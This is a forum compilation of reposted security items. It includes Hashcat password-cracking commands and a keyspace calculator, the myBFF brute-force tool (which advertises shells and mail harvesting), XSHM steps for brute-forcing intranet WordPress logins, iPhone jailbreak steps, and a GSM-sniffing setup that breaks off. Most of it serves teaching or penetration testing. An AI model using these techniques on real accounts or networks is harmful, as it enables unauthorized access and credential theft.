Everything posted by Nytro
pev
pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries. This is the current source for a likely unreleased version. Use at your own risk. For more information and stable releases, please refer to http://pev.sourceforge.net/

How to get the source code?
git clone --recursive https://github.com/merces/pev.git

How to build on Linux?
cd pev
make
NOTE: You may need to install OpenSSL using your package manager. Examples:
apt-get install libssl-dev
yum install openssl-devel

How to build on OS X?
cd pev
CFLAGS="-I/usr/local/opt/openssl/include/" LDFLAGS="-L/usr/local/opt/openssl/lib/" make
NOTE: You may need to install OpenSSL via Homebrew:
brew update
brew install openssl
brew link --force openssl

How to build on Windows (via Cygwin)?
cd pev
make
make zip
NOTE: The following packages must be installed along with your Cygwin:
- gcc-core
- binutils
- make
- zip
- openssl-devel
- git (just to clone the repository and make things easier)
Please check the online documentation for more details.

Link: https://github.com/merces/pev
Jonathan Zdziarski (@JZdziarski): In honor of the iPhone's 10th Anniversary, here are the original jailbreak instructions for iOS 1.0.

Opening the iPhone
NerveGas has the spirit. It exploits Apple's 'generosity' in leaving things inside the (only) perimeter 'wide open'. NerveGas on #iphone figured out a clever way of enabling SSH on the iPhone. First he overwrites the update binary with chmod. Then he tricks the iPhone into calling update so he can reset the mode of the Dropbear server to make it eXecutable. Then he puts everything back where it was. Mission accomplished!

Working SSH Instructions by NerveGas
Previous instructions on the net have required the use of restore mode to set binary permissions. Unfortunately, restore mode doesn't work with all public versions of iPhoneInterface I've tried. The instructions below work by overwriting an existing binary on the system with chmod, and then calling it with the appropriate arguments to set permissions. The result is a fully functional SSH setup. You can then proceed to uploading your own world builds, or other programs to execute via commandline.

Step 1: Key creation.
On your Mac or PC download Dropbear from here: http://matt.ucc.asn.au/dropbear/dropbear.html
Run:
./configure && make
You don't need to install the software, just run:
./dropbearkey -t rsa -f dropbear_rsa_host_key
./dropbearkey -t dss -f dropbear_dss_host_key
And copy the two new key files into your iPhoneInterface directory.

Step 2: Uploading Dropbear and friends.
Download the iphone-ssh kit and the iphone binaries kit:
http://www.abigato.com/iphone-ssh-kit-vr1.tar.bz2
http://netkas.freeflux.net/blog/
Rename sh6 from the kit to sh. Use the jailbreak application to break out of jail and then open iPhoneInterface to connect.
mkdir /etc/dropbear
cd /etc/dropbear
putfile dropbear_rsa_host_key
putfile dropbear_dss_host_key
cd /bin
putfile chmod
putfile sh
cd /usr/bin
putfile dropbear

Step 3: Overwriting 'update' with 'chmod'.
While still connected to iPhoneInterface make a backup copy of /usr/sbin/update:
cd /usr/sbin
getfile update
Rename this to update.original on your local filesystem. Now copy the 'chmod' binary to 'update' and upload it back to the iPhone:
cd /usr/sbin
putfile update

Step 4: Overwriting the update configuration.
Now the 'update' binary is really 'chmod' and has execute permissions! We just need to tell the iPhone to chmod next time it boots. To do this, we download /System/Library/LaunchDaemons/com.apple.update.plist and add our own arguments to ProgramArguments:
0 /usr/sbin/update
1 555
2 /bin/chmod
3 /bin/sh
4 /usr/bin/dropbear
Save the new plist and upload it back to the iPhone:
cd /System/Library/LaunchDaemons
putfile com.apple.update.plist
While we're here, let's also:
putfile au.asn.ucc.matt.dropbear.plist

Step 5: Reboot the iPhone twice.
The first reboot should set the permissions on the dropbear and related binaries. The second reboot should start dropbear, so you can ssh to it:
ssh -l root [IP ADDRESS]
The root password is 'dottie'.

Step 6: Replace the original update and com.apple.update.plist files.
Don't forget to put the old update files back. Rename update.original back to update, and delete the extra ProgramArguments you added to com.apple.update.plist. Now put them back:
cd /System/Library/LaunchDaemons
putfile com.apple.update.plist
cd /usr/sbin
putfile update

Step 7: Change the root password.
If you don't like 'dottie', you can generate a new encrypted password by running:
perl -e 'print crypt("MYPASSWORD", "XU");'
Where MYPASSWORD is the new password you want, and XU is a random two-letter salt. Copy the encrypted output and replace the existing one in /etc/master.passwd on the phone.

You're done! Enjoy!
-NerveGas

Source: http://rixstep.com/2/2/20070805,00.shtml
Cracking 12 Character & Above Passwords: Combo & Hybrid Password Attacks
January 8, 2017 · Hash Crack, Password Cracking, Cyber Security

Cracking The 12+ Character Password Barrier, Literally
12 Characters? Are you serious?! What do I mean by cracking 12 character passwords and above? I'm simply stating that with modern hardware, like the "budget" cracking rig, we can almost exhaustively search the highest probability keyspace for candidate passwords, against fast hashes like MD5, NTLM, SHA1, etc., in a reasonable amount of time. Normally anything above 8 characters isn't practical and/or feasible to brute force against standard fast hashing algorithms. When factoring in language and human peculiarities, like the average English word being only 4.79 characters long and people preferring multiple common words when creating passwords of 10 characters or longer, you are within cracking distance of these passwords. For a quick reference guide to the various cracking tools and their usage check out Hash Crack on Amazon.

Why are 12+ character passwords vulnerable?
Practically speaking, people that manually create passwords above 10 characters, for the most part, use common words or phrases. Why do they do this? Because remembering the password "horsebattery123" is way easier than "GFj27ef8%k$39". It's just simple human behavior exhibiting the path of least resistance that will always exist and, until auto-generating password managers gain mass adoption, this vulnerability will always be around. I agree that XKCD's password strength cartoon of four random words is sound, but only for non-fast hashing algorithms like bcrypt. In this article we will demonstrate Combo and Hybrid Attacks using Hashcat that will expand your cracking knowledge toolkit. These examples will show how an attacker can efficiently attack this larger keyspace, with modern hardware, and make these so called strong passwords succumb to his cracking methodology.
Combo & Hybrid Attack Background
First a quick background of these attack methods:

Combo Attack: all words in two dictionaries are appended to each other.
EXAMPLE
dictionary1.txt dictionary2.txt
pass => password, passpass, passlion
word => wordpass, wordword, wordlion
lion => lionpass, lionword, lionlion

Hybrid Attack: a dictionary attack but with the ability to append/prepend a brute-force mask.
EXAMPLE
dictionary.txt ?u?l?l
pass => passAbc, passBcd, passCde
word => wordAbc, wordBcd, wordCde
lion => lionAbc, lionBcd, lionCde

*password candidate generation order not completely accurate but you get the idea
**further explanation can be found at the Hashcat website

Combo Attack
Let's look at how the Combo attack can help us with passwords that are English words appended to each other, and the best dictionary to get the job accomplished is Google's 10,000 most common words list. This is a list of the 10,000 most common English words in order of frequency, as determined by n-gram frequency analysis of Google's Trillion Word Corpus. Now let's use an example of two randomly selected English words combined to form a 16 character password like shippingnovember. Here's how we would combo attack this password with Hashcat if it was hashed as an MD5:
Example
hashcat -a 1 -m 0 hash.txt google-10000.txt google-10000.txt
By having Hashcat combine every word in this list with each other the password falls in less than 1 second using modern hardware. Not too shabby, and this attack will still work reasonably well against some of the medium to slower hash types as well. Before the critics say, "Well you could just capitalize the words or add a digit or special character and you would be fine to form a new password like ShippingNovember," let us test that theory real quick. Let's combine that google-10000 dictionary into one single dictionary using the Hashcat utils "combinator.bin". This allows us to manipulate the combined words with rules.
Example
combinator.bin google-10000.txt google-10000.txt > google-10000-combined.txt
Now that we have our newly combined dictionary we can just run a rules based attack against the new modified password ShippingNovember using Hashcat like below:
Example
hashcat -a 0 -m 0 hash.txt google-10000-combined.txt -r best64.rule
This one falls in 28 seconds, so much for that theory. And we could create rules to account for added special characters, non-traditional placement, 133t speek, etc. You get the point.

3 Words
Now using the combined dictionary we just created let's go after a three word random phrase password like "securityobjectivesbulletin"... looks pretty strong right? But since we just created the new "google-10000-combined.txt" dictionary we can use the combo attack again like the following, with double-words in the first dictionary and single words in the second dictionary:
Example
hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000.txt
This one could have been a little more difficult if some character variation was added, but as you can see the straight random English words fall in 2 seconds. Are you seeing a trend here yet?

4 Words
Let's go big and attack the XKCD password instructions of four random English words to create a new password "sourceinterfacesgatheredartists". This addition of one more word just drastically increased our keyspace to 10,000,000,000,000,000 candidates, but just like the previous attacks it will fall, mostly because of us using MD5 as the hashing function. Again we will use our newly created "combined" dictionary twice and tell Hashcat to perform a combo attack:
Example
hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000-combined.txt
This cracking attempt could have taken 4 days to complete, using modern hardware, but luckily we found the candidate just 5hrs 35mins into the cracking session.
Simple modifications to this password like numbers or special characters in the middle would have made this password beyond our reach, but again random common words are no match.

Hybrid Attack
Hybrid Attacks take a little more creativity to find interesting attack plans, but it's so much fun when you find that perfect pattern. It's like gold mining for passwords: when you hit that rich vein of patterns and the passwords begin to scroll by in real-time in your terminal, you could almost levitate out of your seat.

Google-10000 + Mask
For the first example we will use our previous work from the Combo Attack demonstration and incorporate the google-10000.txt list to form the base words of our candidate generation. Then we are going to break out PACK (Password Analysis and Cracking Kit) and focus on the hashesorg251015.txt dictionary from weakpass.com. I picked the hashesorg dictionary because of its efficiency rating of 65.9 and its relatively small size. What we will do is analyze the hashesorg dataset and create masks based on the most popular password patterns constrained to a certain character length. These masks will be appended/prepended to our base words from google-10000.txt to form an efficient Hybrid Attack.
PACK Example
Generate initial mask statistics studying passwords of length 5-6 characters and output to a masks file. (Be aware this may take some time to generate.)
python statsgen.py hashesorg251015.txt --minlength=5 --maxlength=6 --hiderare -o hashesorg_5or6.masks
Now let's output the masks in Hashcat format into a .hcmask file so we can use them seamlessly within a Hashcat Hybrid Attack:
PACK Example
python maskgen.py hashesorg_5or6.masks --optindex -o hashesorg_5or6.hcmask
We can now begin the Hybrid Attack using attack mode 6 in Hashcat to append the newly created hashesorg masks file. This will launch a sequential attack beginning with the first mask and working its way down the list.
Some attacks will go very quickly and others could take a little more time. For testing purposes we will use a random password "environmentsqaz472" we know will hit eventually during the attack.
Example
hashcat -a 6 -m 0 hash.txt google-1000.txt hashesorg_5or6.hcmask
This attack took nearly 20 minutes before it eventually cracked, reaching the mask ?l?l?l?d?d?d and then hitting within 14 seconds of starting that mask.

Rockyou + Rockyou-1-60.hcmask
Now let's use Hashcat's built-in masks derived from the Rockyou password dataset. The rockyou masks in Hashcat have been broken into smaller chunks that grow in size based on the numbering, which I assume accounts for the percentage of passwords that fall within that category of masks. We are going to use the smallest .hcmask file, rockyou-1-60, because it contains the higher probability masks and it works well with a Hybrid attack. We are also going to pair this with the actual Rockyou passwords which can be retrieved <HERE> at Skullsecurity. Be careful when pairing with a dictionary to ensure the dictionary is not too large, otherwise your attacks will take a VERY long time. I like to keep my Hybrid dictionary size below 500MB and even smaller based on the masks I plan to append/prepend. Let's draw at random from the Rockyou dictionary the password "sophia**!" and we will add an arbitrary date, just like a user would, to the front: "1996". This leaves us with the password 1996sophia**! to test against. Again this attack is going to run through the list of masks sequentially contained in the rockyou-1-60 dataset and prepend them to every password contained in the Rockyou dictionary.
Example
hashcat -a 7 -m 0 hash.txt rockyou-1-60.hcmask rockyou.txt
This attack hits on a mask of ?d?d?d?d after only a few minutes. Again this is for demonstration purposes but shows the process and power of generating Hybrid Attacks.
The rockyou-1-60.hcmask contains 836 different masks representing the top occurrences in the rockyou.txt dictionary, and if that variation isn't enough for you Hashcat includes ALL the masks for the rockyou dataset.

Cut First 5 Chars + Mask
Let's get creative and create our own dictionary and masks to pair with a Hybrid Attack, and since we learned that the average English word is 4.79 characters long we will make our dictionary contain words only up to 5 characters long. We will again use the rockyou.txt dictionary for this example. Here is how we can chop the first 5 characters from the dictionary and sort it uniquely into our new first5_dict.txt dictionary. Depending on your hardware this may take some time to complete. You will also notice this new dictionary comes out to 18MB in size, which is a little on the small side for an attack against MD5 but would be perfect for a slower hash.
Example
cut -c 1-5 rockyou.txt | sort -u > first5_dict.txt
Let's pair this new first5_dict.txt dictionary again with the rockyou-1-60 masks built into Hashcat. Now I know some candidates generated will be below 12 characters, but you can always sort out the masks that are below 7 chars and create a new .hcmask file. Now again let's create a random password from the list: we will choose Alty5 from first5_dict.txt and the random digits 9402847 and combine them into Alty59402847.
Example
hashcat -a 6 -m 0 hash.txt first5_dict.txt rockyou-1-60.hcmask
This attack is especially effective against users who love using the same base words or digits for their passwords but append or prepend "randomness" to the passwords based on the account. This password falls within a total of 30mins.

Straight Mask Attack 12 Chars +
I know this isn't a Hybrid attack but it's worth mentioning that 12 character mask attacks are still reasonable, especially if you formulate them using the PACK tool.
A 1 day attack (86400 seconds) can be formulated using the speed of your rig against a certain hash type, which can be measured by performing a hashcat -b -m #type from the terminal. Let's quickly show how to follow these steps to create a mask attack for passwords from 12 - 15 characters in length using PACK. Let's again use the rockyou.txt dictionary as an example to generate these masks, but let's first estimate the speed of our cracking rig against md5 hashes.
Example (md5)
hashcat -b -m 0
Now that we know our rig's cracking speed is 76 billion (76,000,000,000 c/s) let's create the new masks using PACK from the rockyou.txt dictionary.
Example
python statsgen.py rockyou.txt -o rockyou.masks
We can now create our Hashcat hcmask file tailored to a 1 day (86400 seconds) cracking speed attack which covers character lengths of 12-15.
Example
python maskgen.py rockyou.masks --optindex --minlength=12 --maxlength=15 --targettime=86400 --pps=76000000000 -o rockyou_12-15.hcmask
Now we can run a series of mask attacks using rockyou_12-15.hcmask against md5 hashes we know will complete within 1 day's time. Pretty awesome right?!
Example
hashcat -a 3 -m 0 hash.txt rockyou_12-15.hcmask

Conclusion
So as you can see 12 character passwords are not that inconceivable to crack. It just takes a little finessing and a little creativity to formulate the correct strategy. Also don't always assume that since your password is above 11 characters the online service you trusted with this password is going to hash it properly, thanks $4.8 billion company Yahoo. I hope I've demonstrated that you need unique words, digits and not just four random common words all lowercased, and if you need more convincing check out my friend Troy Hunt's write-up <HERE>. If you are really smart you will begin using a password manager like 1Password or Keepass to generate and database your passwords across devices.
I'd like to plug Dumpmon's Twitter feed as a good place to find hashes to practice on for research purposes. You can follow me on Twitter @netmux, and lastly for a good pocket reference guide on cracking tool usage and syntax check out Hash Crack.
"The cyber general who wins the battle makes many calculations in the terminal before hacking begins." - Cyber Sun Tzu

Source: http://www.netmux.com/blog/cracking-12-character-above-passwords
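The post quotes candidate counts (10,000^4 = 10^16 for four words) and a benchmarked rate (76 billion MD5 c/s), and uses PACK's --targettime/--pps to cut a mask list down to a one-day budget. The following calculator, added here as an example and not the post author's or hashcat's code, does that arithmetic for the combo, hybrid and straight-mask attacks described above, so a defender can estimate how long a given passphrase policy would survive at a given rate. It assumes hashcat's built-in charset sizes (?l=26, ?u=26, ?d=10, ?s=33, ?a=95, ?b=256); the MD5 rate and the 10,000-word list size come from the post, while the slow-hash rate in the demo at the bottom is an assumed, illustrative figure.

```python
"""Keyspace and time-to-exhaust estimates for combo, hybrid and mask attacks.

Added example: not the post author's code and not part of hashcat or PACK.
Charset sizes follow hashcat's built-in charsets; MD5_RATE is the figure
quoted in the post. The slow-hash rate used in the demo is assumed."""

# Sizes of hashcat's built-in mask charsets.
CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}

MD5_RATE = 76_000_000_000  # c/s, as benchmarked in the post


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat mask such as '?l?l?l?d?d?d' expands to.
    '??' is a literal question mark; any other literal character is one fixed
    position and does not enlarge the keyspace."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sym = mask[i + 1]
        if sym != "?":
            if sym not in CHARSETS:
                raise ValueError(f"unknown charset ?{sym}")
            total *= CHARSETS[sym]
        i += 2
    return total


def combo_keyspace(*dictionary_sizes: int) -> int:
    """Candidates from concatenating one word from each dictionary: what -a 1
    does for two lists, and what feeding combinator output back in as a
    dictionary does for three or four."""
    total = 1
    for size in dictionary_sizes:
        total *= size
    return total


def hybrid_keyspace(dictionary_size: int, mask: str) -> int:
    """Candidates for -a 6 / -a 7: every word paired with every mask expansion."""
    return dictionary_size * mask_keyspace(mask)


def seconds_to_exhaust(keyspace: int, rate: float) -> float:
    """Worst-case time to try every candidate at `rate` hashes per second."""
    return keyspace / rate


def masks_within_budget(masks, rate: float, budget_seconds: float):
    """Walk the masks in order and keep those whose full keyspace still fits
    into the remaining time budget, the filtering PACK's --targettime/--pps
    express. Returns (kept_masks, seconds_needed_for_kept_masks)."""
    kept, used = [], 0.0
    for mask in masks:
        cost = seconds_to_exhaust(mask_keyspace(mask), rate)
        if used + cost <= budget_seconds:
            kept.append(mask)
            used += cost
    return kept, used


def human(seconds: float) -> str:
    """Render seconds in the largest convenient unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    slow_rate = 20_000  # assumed illustrative rate for a slow, salted hash
    for words in (2, 3, 4):
        ks = combo_keyspace(*([10_000] * words))
        print(f"{words} common words: {ks:,} candidates -> "
              f"MD5 {human(seconds_to_exhaust(ks, MD5_RATE))}, "
              f"slow hash {human(seconds_to_exhaust(ks, slow_rate))}")
    print("word + ?l?l?l?d?d?d at MD5 rate:",
          human(seconds_to_exhaust(hybrid_keyspace(10_000, "?l?l?l?d?d?d"), MD5_RATE)))
    # Constructed mask list, filtered to a one-day budget at the MD5 rate.
    sample = ["?l?l?l?l?l?l?l?l?l?l?l?l", "?l?l?l?l?l?l?l?l?d?d?d?d",
              "?u?l?l?l?l?l?l?l?d?d?d?d?d", "?a?a?a?a?a?a?a?a?a?a?a?a"]
    kept, used = masks_within_budget(sample, MD5_RATE, 86_400)
    print("masks that fit in one day:", kept, human(used))
```

Running it shows the post's four-word case exhausting in about a day and a half at 76 billion c/s, while the same keyspace at a slow-hash rate runs to many thousands of years; that difference, not the word count, is what makes the XKCD scheme hold up only behind bcrypt-class hashing.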
myBFF is a web application brute force framework (currently). Point the framework at a file containing usernames, a host, and give it a password. The framework will determine what type of web application is in use, then attempt to brute force accounts. After brute forcing accounts, myBFF will then do a little more, like enumerating apps available, and reading in important data. Each module is different so try them out!

Current modules:
- HP SiteScope (will attempt to give you a Meterpreter Shell!)
- Citrix Gateway (also enumerates authorized applications)
- Juniper Portal (Will look for 2FA bypass and list what is accessible)
- MobileIron (Unknown. Have to find out what is accessible first!)
- Outlook/Office365 (will parse email, contacts, and other data from email)
- Wordpress (Will be adding "SomethingCool" soon)
- CiscoVPN (Enumerate User accounts (May not work on all configurations))
- Okta (Enumerate Applications and check if 2FA is setup for account)
- Jenkins (Will be adding "Something Cool" soon)
- SMB (Check if user is an administrator) (must use --domain with this module. for host, use smb://)
- FTP (List root dir contents)
New modules will be added.

CONFIGURATION
myBFF requires lxml and pysmb. Install using:
sudo apt-get install python-lxml
sudo pip install pysmb

Link: https://github.com/MooseDojo/myBFF
Web Application Penetration Testing: Local File Inclusion (LFI) Testing Techniques
Jan 04, 2017, Version 1.0
©2017 – Aptive Consulting Ltd

This document and the templates used in its production are the property of Aptive Consulting Ltd and cannot be copied (both in full or in part) without the permission of Aptive Consulting Ltd. While precautions have been taken in the preparation of this document, Aptive Consulting Ltd the publisher, and the author(s) assume no responsibility for errors, omissions, or for damages resulting from the use of the information contained herein. The information herein is provided for educational and informative purposes only, Aptive Consulting Ltd the publisher and author(s) take no responsibility or liability for the actions of others.
Aptive: phone: +44 (0)3333 440 831 | email: contact@aptive.co.uk | web: https://www.aptive.co.uk

Introduction
The intent of this document is to help penetration testers and students identify and test LFI vulnerabilities on future penetration testing engagements by consolidating research for local file inclusion (LFI) penetration testing techniques. LFI vulnerabilities are typically discovered during web app penetration testing using the techniques contained within this document. Additionally, some of the techniques mentioned in this paper are also commonly used in CTF style competitions.

Download: https://www.exploit-db.com/docs/40992.pdf
Identifying WordPress Websites On Local Networks (behind Firewalls) and Bruteforcing the Login Pages
Last Updated: Thu, 05 Jan 2017 - by Sven Morgenroth

Statistics from w3techs suggest that 1 out of 4 websites (around 25%) on the internet are powered by WordPress. WordPress' popularity is derived from its ease of setup and use, its contributing community, and the big repertoire of plugins and themes that are available.

Why is WordPress Such a Common Target?
Even though WordPress is a beginner friendly web application, like every other platform it has its own issues and limitations. One of the most voiced security issues is that it is possible and very easy to bruteforce login credentials. WordPress' advice on this is to install a security plugin, protect the WordPress login page with a .htpasswd file (HTTP authentication), and of course use strong credentials. However many users, especially the inexperienced ones, do not take these extra security measures onboard. They use very weak credentials and do not set up any additional layers of security on their websites, thus making WordPress a good target for brute force attacks.

How to Bruteforce WordPress Websites and Blogs Running on Internal Networks and Behind Firewalls
WordPress blogs aren't always used for publicly accessible websites. They are also frequently used as websites in intranets for employees. Typically intranets are not reachable from the outside (the internet) because they are sitting behind a firewall. WordPress websites running in intranets are still at risk, though; attackers can effectively brute force a WordPress blog or website in an internal network via XSHM, without having direct access to it.

What is XSHM?
XSHM is an abbreviation for Cross Site History Manipulation. It is a security breach in the Same Origin Policy, which is used by web browsers to prevent different websites from retrieving information from each other when a user is accessing them both. This means that website A cannot read the content of website B when both are accessed at the same time in different browser tabs. However, there are some side channel attacks that can be used to leak certain information even though the same origin policy is in place. XSHM is one of them and below is an example:
1. An attacker creates an iframe on a website he controls (website A) and points it to a page on website B that has a conditional redirect. For example the iframe points to login.php, which when accessed redirects the user to index.php if he is logged in.
2. The attacker retrieves the history.length value of the browser tab.
3. The attacker updates the iframe to point to index.php.
4. When the user accesses the iframe again, the attacker retrieves the new value of the history.length property again and compares it to the one in step 2.
Since the web browser does not increase the history.length value if the URL of the iframe is the same as the URL the user is currently browsing, it is easy to determine if the user is logged into WordPress or not. Therefore if the history.length value remains the same, it means that the user was redirected to index.php, which means he is logged in.

How to Identify WordPress Websites on a Local Network
WordPress has a unique redirect that makes it really easy for attackers to spot. If a user is not logged in and visits the page /wordpress/wp-admin/, he is redirected to:
/wp-login.php?redirect_to=http%3A%2F%2Fexample.com%2Fwordpress%2Fwp-admin%2F&reauth=1

Using XSHM
Therefore to find WordPress websites on an internal network an attacker can send the victim a link with an XSHM payload that tries the above redirect on a range of internal IP addresses such as 192.168.1.1/24 when a user clicks the link.

Using JavaScript
The attacker can also use JavaScript to scan internal networks for websites running on WordPress.
For example by using WebRTC, as implemented in the BeEF framework, he can narrow down the list of live hosts which have to be checked for the above WordPress redirect. Once the scanning is done the attacker should have a list of internal IPs running WordPress. You can download a PoC of the JavaScript.

How does bruteforcing WordPress logins work with XSHM?
Now that the attacker has identified the WordPress websites he can start the brute force attacks with XSHM, even though he does not have direct access to them. This is possible due to the fact that WordPress does not have a token to prevent logins via CSRF. There is a general misunderstanding of whether or not CSRF Tokens are necessary in login forms. Note: Tokens in login pages are necessary. It is generally advised to secure your WordPress login page with Tokens to prevent these types of attacks. There are several other attack vectors that use the login CSRF as entry points, which are not obvious but can have serious impacts, such as logging the user in to an attacker's account without his knowledge and stealing private information. It might also be possible to abuse an otherwise not reachable Stored Cross-site Scripting (XSS) vulnerability.

WordPress also provides a redirect_to form field in its login, which lets the attacker specify where he wants the victim to be redirected after a successful login. This suits the attacker's XSHM attack perfectly. He can now use a website which makes a CSRF attack based on GET parameters and supply different username / password combinations. The attack works as follows:
1. Retrieve the value of the history.length property of the victim's browser tab.
2. Point the src of the iframe to the page that carries out the CSRF attack. This can be done by using a self-submitting form to the wp-login page with a username / password combination.
3. Point the iframe to the path from the redirect_to parameter.
4. Check the value of the victim's history.length.
From the value of the history.length property the attacker can now tell whether or not the attack was successful, because the attacker knows that a successful login means that WordPress redirected the user to the page in the redirect_to parameter. Therefore if the value of the history.length property does not increase, he knows that the attack was successful. The attacker is also able to tell if a CSRF attack worked under certain conditions, which usually isn't possible due to the Same Origin Policy.

Proof of Concept Video
Below is a proof of concept video of how WordPress websites running on internal networks can be identified, even when running behind a firewall, and how a bruteforce attack is then launched against them.

Limitations and Problems of the WordPress Login Page Attack via XSHM

The Attack is Easily Noticed
In order for this WordPress attack to succeed the attacker needs at least two interactions from the victim: First he must convince the victim to visit his malicious web page. After that the victim must click a button or link on the attacker's page that opens a new browser window or tab. This is required since it is not possible to open a new window or tab without user interaction, because of popup blockers. Since the victim can easily notice the newly opened tab and the page refreshes, the chances of the victim not noticing the attack are very slim. Also, the attacker can't just create a simple iframe as the wp-login page is secured with X-Frame-Options. This might cause problems in some web browsers since they might not increase the history.length value if this header is set, thus it could be very difficult for an attacker to determine if there is a WordPress or not.
Different Browsers' Behaviour Complicates Matters
Another problem is that some browsers such as Chrome always change the value of the history.length property, even if the attacker redirects the iframe to its current src. This might be a counter measure for the XSHM attack, and in fact the attack will fail. So how can the attacker change the history.length without an iframe on the current page?

Using Window.Opener in the XSHM Attack
The answer is window.opener. If a new browser window or tab is opened from another tab, either by clicking a link or with JavaScript, the new page can access its parent's window object. It is even possible to get the value of the history.length property if the page is from the same origin. At first this does not seem very useful, since the attacker needs to know the value of the history.length property after redirecting to a cross origin page to carry out the XSHM attack. But since the attacker can set the location of the parent window, even cross-domain, he can do the following:
1. Open a child window from his page, for example attacker.com/opener.html -> attacker.com/child.html
2. In the child window the attacker uses opener.history.length to retrieve the history length from attacker.com/opener.html
3. Set the location of the opener window to http://192.168.1.123/wordpress/wp-admin/ using opener.location
4. Set window.opener.location to http://192.168.1.123/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.123%2Fwordpress%2Fwp-admin%2F&reauth=1
5. Set opener.location back to attacker.com/opener.html to be on the same origin again.
Now the attacker should be able to get the value of opener.history.length again and compare it to the one from step 2. This way the attacker can also bypass the X-Frame-Options protection against XSHM. This could also be done stealthily by using a popunder window.
The Maximum Value of the history.length Property
Another problem that might hinder these types of attacks is the maximum value of the history.length property. For example on Chrome its highest value can be 50. If the value needs to be increased and it is already at 50, the first (oldest) entry is removed and the last entry is added. This can be a problem when doing a Cross Site History Manipulation attack, but as a workaround the attacker can:
1. Trick the victim into visiting a URL from the same origin with window.opener.location.
2. Then trick the victim again to navigate back to the first page he visited in the current session with window.opener.history.go(-(window.opener.history.length-1)). This first retrieves the number of pages the user can go back and then goes back to the first page.
3. Set the URL to a new link. The history value is 2 now.
This way the attacker bypasses the problem of the 50 entries limit.

Dealing with Logout CSRF Protection
Another hurdle for the XSHM attack is the logout CSRF protection. If the user is logged in the attacker usually can't reliably check whether or not there is an actual WordPress installation on the server, so he can't brute force the login page with a user that is already logged in. Well, WordPress is a little special in this case. When the victim visits wp-login.php he is greeted with a login prompt whether or not he is logged in. This would solve the problem the attacker would have with bruteforcing credentials, however it is still not possible to reliably check with wp-login / wp-admin if there is a WordPress installation on the web server. But WordPress has an additional parameter you can set to actually log you out when you visit wp-login. It is called reauth. When it is set to 1 you are automatically logged out, which means the attacker can try to point the victim to wp-admin and see if it redirects him to wp-login again.

How can You Mitigate against the XSHM Attack?
As a WordPress user you can’t take any precautions to prevent XSHM attacks, since this is a browser feature you can’t control. You can only rely on the developers of the respective website to take all the necessary precautions that prevent XSHM attacks. These include: Avoiding conditional redirects that can leak sensitive information. Using of CSRF Tokens. It can also be a good idea to add random characters to the URL. These don’t have to be connected to any application level logic, like CSRF tokens do, but can make it difficult for an attacker to guess the exact link where the victim will be redirected to. Note: While there is a proof of concept for this WordPress attack it is unlikely to be used in a real life scenario because of the knowledge that is required about the target and because of the long time the victim has to spend on the attacker’s page, while having a refreshing window in plain sight. Sursa: https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/
SNIFFING GSM TRAFFIC WITH HACKRF

While my friend and colleague Simone was visiting our ZIMPERIUM – Enterprise Mobile Security TLV office, we got our hands on a HackRF and hacked together the unguarded borders of radio frequencies. Simone had the great patience to try and explain to me the boring world of complex numbers and friends (more on that here), but my dyslexia won over again and left me to fill the gap by following Simone's steps (and some mistakes, eh Simone?) and use my 'trial & error' approach until success. This tutorial is the result of our collaborative GSM hacking session, presented with the hope it will be useful for others.

TOOLS USED:

hackrf_kalibrate
gnuradio-companion
gr-gsm
gqrx
wireshark

INSTALL REQUIREMENTS:

First thing, you want to make sure you have all the required software installed; you can install most of them and their dependencies using your distribution package manager. Let's start with the libraries and tools for the hackrf itself; on a Debian/Ubuntu distro you'll install them like so:

    sudo apt-get install hackrf libhackrf-dev libhackrf0

Once these libraries are installed, you can plug your hackrf into one of your USB ports and execute the hackrf_info command; at this point you should see something like the following:

    # hackrf_info
    Found HackRF board.
    Board ID Number: 2 (HackRF One)
    Firmware Version: 2014.08.1
    Part ID Number: 0x00574746 0x00574746
    Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f4339e1

You will now install gnuradio, which is the software we'll use to decode the RF signals, gqrx, a tool to visualize signal power on certain frequencies, and everything else that will be needed in the next steps:

    sudo apt-get install gnuradio gnuradio-dev gr-osmosdr gqrx-sdr wireshark

Proceed with gr-gsm, the GnuRadio blocks that will decode GSM packets:

    sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
    git clone https://github.com/ptrkrysik/gr-gsm.git
    cd gr-gsm
    mkdir build
    cd build
    cmake ..
    make
    sudo make install
    sudo ldconfig

Now create the file ~/.gnuradio/config.conf and paste the following contents into it:

    [grc]
    local_blocks_path=/usr/local/share/gnuradio/grc/blocks

Finally install kalibrate-hackrf, a tool that will hop among known GSM frequencies and tell you which ones your country is using:

    git clone https://github.com/scateu/kalibrate-hackrf.git
    cd kalibrate-hackrf
    ./bootstrap
    ./configure
    make
    sudo make install

FINDING GSM FREQUENCIES:

Each operator in each country uses a different frequency in the possible GSM spectrum, which usually starts from 900MHz. You can use hackrf_kalibrate to find the frequencies you want to sniff:

    ./kal -s GSM900 -g 40 -l 40

Note the two gain values; those are important in order to get some results. Leave kalibrate running and after a while you should see an output similar to this:

You will have to use the proper GSM parameter ('-s') to correspond to your local operator. Consult this list for verification.

Sometimes you might want to see the frequencies in order to ensure correct results from hackrf_kalibrate, or to save yourself from calculating the correct frequency given by hackrf_kalibrate (notice the +/- kHz sign of each result – this means the top peak with the corresponding power, not the 100% correct frequency). Open gqrx and tune it to the first frequency you got from hackrf_kalibrate, for example 940.6MHz, and you'll see something like the following picture:

